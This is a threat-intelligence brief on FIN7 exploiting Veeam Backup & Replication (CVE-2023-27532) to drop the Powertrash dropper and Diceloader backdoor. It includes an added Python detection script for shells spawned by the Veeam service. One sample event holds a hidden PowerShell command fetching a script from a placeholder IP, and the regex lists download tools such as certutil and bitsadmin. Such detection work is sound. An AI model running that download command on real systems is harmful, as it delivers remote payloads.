The Russian threat group FIN7 has been found exploiting unpatched Veeam Backup & Replication instances. FIN7, which has been active since at least 2015, primarily focuses on financially motivated crimes related to stealing credit card information.

What’s buggin’

In early March, Veeam Backup & Replication vulnerability CVE-2023-27532, with a CVSS score of 7.5, was disclosed and patched. 
  • Approximately two weeks later, its Proof-of-Concept (PoC) exploitation code was publicly released.
  • Veeam stated that if successfully exploited, the bug could enable an attacker to obtain encrypted credentials stored in the Veeam backup database.
  • Horizon3.ai, the penetration testing firm that released the PoC, claimed that the flaw allows attackers to access cleartext credentials.

FIN7 drops tools

The threat actor was observed engaging in various malicious activities, including network reconnaissance, stealing data from the Veeam backup database, exfiltrating stored credentials, achieving persistence for the Diceloader backdoor, and lateral movement using stolen credentials.
  • The Powertrash in-memory dropper, a known tool used by FIN7, was observed being downloaded and executed by a shell command during a Veeam Backup process. 
  • This dropper was used to carry Diceloader or Lizar, a backdoor also associated with FIN7, which allows the attackers to perform various post-exploitation actions.

While it is unclear how the threat actors invoked the initial shell commands, they are suspected to have exploited CVE-2023-27532 in Veeam Backup & Replication, which can grant unauthorized access to the instance.
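As an added example (not part of the Cyware brief or WithSecure's report), a minimal detection over constructed Sysmon-style process-creation events: it flags command shells spawned by the Veeam backup service, which is how the Powertrash dropper was reported to arrive, and raises the severity when the command line carries a download cue. The parent process name Veeam.Backup.Service.exe, the shell list and the sample events are assumptions, not values from the report.

```python
import re

# Constructed Sysmon-style process-creation events (fields mimic Event ID 1).
# These are illustrative samples, not data from the WithSecure report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c powershell -nop -w hidden -c "iwr http://203.0.113.5/p.ps1"'},
    {"ParentImage": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c vssadmin list shadows"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Process"},
    {"ParentImage": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe",
     "Image": r"C:\Program Files\Veeam\Backup and Replication\Backup\VeeamAgent.exe",
     "CommandLine": "VeeamAgent.exe --job 42"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumed name of the Veeam backup service binary; adjust to your deployment.
VEEAM_PARENTS = {"veeam.backup.service.exe"}
# Common cues that a command line is fetching something from the network.
DOWNLOAD_CUE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin|certutil", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return 'high', 'medium' or None for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in VEEAM_PARENTS or child not in SHELLS:
        return None  # benign parent/child pairing, e.g. the service launching its agent
    if DOWNLOAD_CUE.search(event.get("CommandLine", "")):
        return "high"  # shell from the backup service that also pulls content from the network
    return "medium"  # shell from the backup service: unusual, worth a look


def scan(events):
    """Run classify() over an event list and collect the hits in order."""
    hits = []
    for ev in events:
        sev = classify(ev)
        if sev:
            hits.append({"severity": sev, "parent": basename(ev["ParentImage"]), "cmd": ev.get("CommandLine", "")})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(h["severity"].upper(), h["parent"], "->", h["cmd"])
```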

FIN7 in headlines

Recently, security experts spotted a new Domino malware campaign and linked it to ITG23 - the TrickBot-Conti syndicate.
  • However, the Domino backdoor was developed by FIN7 and is used to drop Cobalt Strike or the Project Nemesis info-stealer.
  • Furthermore, Domino shares similarities with the Lizar backdoor used in the latest campaign, which ties the malware to FIN7.
  • Such sharing of malware between actors highlights the growing trend of partnerships among threat groups to increase profits.

The bottom line

WithSecure recommends organizations patch and configure their backup servers and look for signs of compromise with the IOCs mentioned in the report. The security researchers identified two instances of the latest attacks. 

Since the initial activities in both instances originated from the same public IP address on the same day, it is probable that they were part of a larger campaign. However, the scope of this attack is likely limited due to the rarity of Veeam backup servers with TCP port 9401 exposed publicly.
Cyware Publisher